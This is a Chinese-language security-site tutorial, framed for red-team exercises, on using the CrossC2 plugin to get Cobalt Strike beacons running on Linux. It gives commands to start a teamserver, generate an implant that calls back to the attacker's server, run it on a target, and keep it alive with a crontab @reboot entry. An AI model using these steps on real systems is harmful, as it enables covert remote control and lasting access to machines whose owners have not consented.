CobaltStrike上线Linux
2023-4-9 21:16:3 Author: www.freebuf.com(查看原文) 阅读量:25 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

在红蓝对抗中,我们常需要对目标进行长时间的控制,cobaltstrike原生对于上线windows比较轻松友好,但如果是Linux平台就需要用到第三方插件了。


准备工作

这里使用CrossC2的插件,类似于在linux上反弹一个cobaltstrike类的shell。

github:https://github.com/gloxec/CrossC2

下载时注意自己的cs版本(我这里使用的是3.0.2的最新版插件,cs版本为4.3)

需要下载以下两个文件:

CrossC2***.cnagenCrossC2.Linux

由于我的木马是在linux平台生成的,因此使用genCrossC2.Linux,可根据自己平台的差异自行选择


服务端部署

cobaltstrike服务端部署

chmod +x teamserver
./teamserver [ip] [password]


客户端连接

建立一个监听器,需要注意的是crossc2插件只支持httpsbeacon

安装crossc2


生成木马

我这里是在服务端的cobaltstrike目录直接生成的,如果在非服务端生成需要将服务端根目录的隐藏文件.cobaltstrike.beacon_keys复制下来放到cs根目录

chmod +x genCrossC2.Linux
./genCrossC2.Linux [ip] [port] ./.cobaltstrike.beacon_keys null Linux x64 /tmp/test


上线

在目标靶机上直接运行就可以看到上线了.

chmod +x test
./test


权限维持

一个简单的思想就是将其添加的系统启动项

有很多种方法,这里讲个最简单的,通过计划任务的方式实现

crontab -e
@reboot /tmp/test

这样每次重启之后都能重新执行

这里需要注意的是要设置以下次登录的用户的crontab


文章来源: https://www.freebuf.com/articles/web/363057.html
如有侵权请联系:admin#unsafe.sh